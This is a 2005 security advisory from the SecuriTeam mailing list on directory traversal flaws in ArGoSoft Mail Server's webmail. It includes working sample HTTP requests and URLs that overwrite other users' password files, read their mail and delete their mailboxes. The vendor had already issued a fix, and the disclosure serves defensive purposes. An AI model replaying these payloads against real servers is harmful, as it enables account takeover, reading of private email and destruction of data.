[NT] ArGoSoft Mail Server Webmail Multiple Directory Traversal Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 02/24/05 

To: list@securiteam.com
Date: 24 Feb 2005 16:47:06 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  ArGoSoft Mail Server Webmail Multiple Directory Traversal Vulnerabilities
------------------------------------------------------------------------

SUMMARY

" <http://www.argosoft.com/mailserver/> ArGoSoft Mail Server is fully
functional SMTP/POP3/Finger (Pro version also has IMAP module) server for
Windows 95/98/NT/2000, which will let you turn your computer into the
email system. It's very compact, takes about 1-5 Mb of disk space
(depending on the version), does not have any specific memory
requirements, and what is the most important - it's very easy to use."

Multiple directory traversal vulnerabilities were found in ArGoSoft Mail
Server's Webmail that may be exploited by a authenticated mail user to
upload files to arbitrary directories on the server, retrieve arbitrary
files from the server, access other users' emails, and create/delete
arbitrary directories on the server.

DETAILS

Vulnerable Systems:
 * ArGoSoft Mail Server version 1.8.7.3

Directory Traversal in Email Attachment Filename:
ArGoSoft Mail Server's Webmail allows a authenticated mail user to upload
file attachments when composing an email. Lack of input validation of the
supplied filename allows the user to upload files to arbitrary locations
on the server. This may be exploited by a malicious mail user to upload
and replace other users' password file (userdata.rec) with a copy that has
known password, thus allowing him/her to authenticate as other users.

A sample malicious file upload HTTP request is shown below:
POST /attachfile HTTP/1.0
Host: localhost
Cookie: ams-auth=XXXXXXXXXXXXX
Content-Type: multipart/form-data;
boundary=---------------------------24242261923581
Content-Length: 456
Connection: Close

-----------------------------24242261923581
Content-Disposition: form-data; name="x"

52
-----------------------------24242261923581
Content-Disposition: form-data; name="y"

10
-----------------------------24242261923581
Content-Disposition: form-data; name="attfile";
filename="../../test2/userdata.rec"
Content-Type: application/octet-stream

__VER__1.8.7.3
XXXXXXXX
test2

test2
0
1
0

-----------------------------24242261923581--

Directory Traversal in _msgatt.rec:
When the Webmail user is composing an email, all attachments uploaded for
that email will be saved in the following temporary directory.

C:\Program Files\ArGo Software Design\Mail
Server\_users\_nodomain\username\_tempatt\

A sample listing of this directory is shown below:

Directory of C:\Program Files\ArGo Software Design\Mail
Server\_users\_nodomain\test\_tempatt
02/09/2005 08:18p <DIR> .
02/09/2005 08:18p <DIR> ..
02/09/2005 08:17p 90 inbox.msl
02/09/2005 08:18p 167 TESTFILE.txt // file attachment uploaded by user
02/09/2005 08:18p 13 _msgatt.rec
02/09/2005 08:18p 0 _msgbody.rec
02/09/2005 08:18p 136 _msgdata.rec
               5 File(s) 406 bytes

The server will create the file (_msgatt.rec) in this temporary directory.
This file contains the filename of all file attachments that the user has
uploaded while composing the current email. The user can control the
contents of this file by uploading a file attachment with the same
filename as this server generated file. The user uploaded copy will
replace the one generated by the server.

By uploading a specially crafted _msgatt.rec containing directory
traversal characters, it is possible to cause the server to send any
arbitrary files on the server as attachment to the user. A malicious user
may exploit this vulnerability to email other user's password file
(userdata.rec) to himself.

A sample malicious _msgatt.rec file is shown below:

./../test2/userdata.rec

This malicious file, when uploaded as attachment and saved to the
temporary directory, will contain two additional lines of server generated
entry as shown below:

./../test2/userdata.rec
-
_msgatt.rec

To ensure that the email can be sent correctly, the malicious user must
"detach" the last two files (i.e. "-" and "_msgatt.rec"). This can be
trivially done via the web interface as shown below. Subsequently, when
the user retrieves his email via IMAP, he'll be able to receive test2's
userdata.rec file as attachment.

Directory traversal in /msg and /delete Folder Parameter:

The /msg link allows the Webmail user to view his/her emails. The full URL
is :

http://[hostname]/msg?MsgNo=0&Folder=inbox&UIDL=sjo2z7plfizwvu3x

It is possible to view other user's email by using directory traversal
characters in the Folder parameter and specifying a correct UIDL. The UIDL
uniquely identifies the email and guessing the UIDL of another user's
email is impractical. However, it possible to obtain a list of the UIDL of
another user's emails by surfing to the following link while being
authenticated. Note that inbox.msl only exists if the other user is
currently authenticated. i.e. The server will create inbox.msl in the
every user's temporary directory (see vulnerability b. above) only after
he/she has authenticated.

http://[hostname]/_users/_nodomain/other_username/_tempatt/inbox.msl

Sample contents shown below:
j18mspvyiitdzxdw
zrr77aepklpadkv5
nuczv11pjysmrceu
10zptzip5g8ejlwx
ymufn1briuvp2ocu

It is then possible to retrieve the other user's emails using the
following link.

http://[hostname]/msg?MsgNo=0&Folder=../other_username/inbox&UIDL=j18mspvyiitdzxdw

The /delete link, which allows the user to delete his/her own emails, is
similarly vulnerable. A sample malicious POST request to /delete is shown
below, this will delete mails belonging to user test2.

POST /delete HTTP/1.0
Host: localhost
Cookie: ams-auth=XXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Connection: Close

x=36&y=11&sel=0&act=1&folderselect=&j18mspvyiitdzxdw=on&Folder=../test2/inbox

Creating or Deleting Arbitrary Directories on the Server
Directory traversal in /folderadd and /folderdelete "Folder" parameter
allows creating/deleting arbitrary directories on the server.

he /folderadd and /folderdelete links allows the Webmail user to
create/delete mail folders. It is possible to use directory traversal
characters in the Folder parameter to create/delete directories in
arbitrary locations on the server. A malicious user may exploit this
vulnerability to delete other users' entire mail directories, which is
effectively the same as removing the users from the system.

The following will totally remove user test2 from the system:
http://[hostname]/folderdelete?Folder=../test2

Disclosure Timeline:
 * 06/02/05 - Vulnerability Discovered.
 * 08/02/05 - Initial Vendor Notification.
 * 08/02/05 - Received Notification from Vendor that Fixed Version was
Released.
 * 09/02/05 - Public Release.

Vendor Status:
Vulnerability fixed.
Patch for vulnerable version released.

ADDITIONAL INFORMATION

The information has been provided by <mailto:chewkeong@security.org.sg>
Tan Chew Keong.
The original article can be found at:
<http://www.security.org.sg/vuln/argosoftmail1873.html>
http://www.security.org.sg/vuln/argosoftmail1873.html

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages